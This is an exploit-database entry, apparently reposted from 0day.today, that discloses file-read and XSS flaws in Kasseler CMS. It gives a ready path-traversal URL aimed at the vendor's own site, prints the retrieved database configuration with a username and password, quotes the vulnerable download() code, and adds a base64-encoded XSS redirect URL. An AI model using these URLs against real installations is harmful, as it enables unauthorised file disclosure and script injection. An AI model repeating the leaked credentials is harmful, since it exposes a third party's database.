Kasseler CMS (FD/XSS) Multiple Remote Vulnerabilities

🗓️ 22 Jun 2009 00:00:00Reported by 0day Today TeamType

zdt🔗 0day.today👁 14 Views

Kasseler CMS multiple remote vulnerabilities in readfile and engine.ph

=====================================================
Kasseler CMS (FD/XSS) Multiple Remote Vulnerabilities
=====================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1


###
Kasseler-Cms (Reafile/XSS) Multiple Remote Vulnerabilities
Site author: kasseler-cms.net
###

Readfile:
http://www.kasseler-cms.net/engine.php?do=download&file=../includes/config/configdb.php :
<?php
/**********************************************/
/* Kasseler CMS: Content Management System    */
/**********************************************/
/*                                            */
/* Copyright (c)2007-2009 by Igor Ognichenko  */
/* http://www.kasseler-cms.net/               */
/*                                            */
/**********************************************/

if (!defined('FUNC_FILE')) die('Access is limited');

$database = array(
    'host'                => 'localhost',
    'user'                => 'kasseler_robin',
    'password'            => 'cs010488oia',
    'name'                => 'kasseler_cms',
    'prefix'              => 'kasseler',
    'type'                => 'mysql',
    'charset'             => 'cp1251',
    'cache'               => '',
    'sql_cache_clear'     => 'INSERT,UPDATE,DELETE',
    'no_cache_tables'     => 'sessions'
);
?>

vulnerability in engine.php:
function download(){
global $config;      
    require_once "includes/class/download.php";
    $file = "uploads/".$_GET['file']; #here =)
    $download = new file_download($file, 0, 1024);
    $download->download();
}

AND XSS bonus:
http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+ 




#  0day.today [2018-01-10]  #

22 Jun 2009 00:00Current

7.1High risk

Vulners AI Score7.1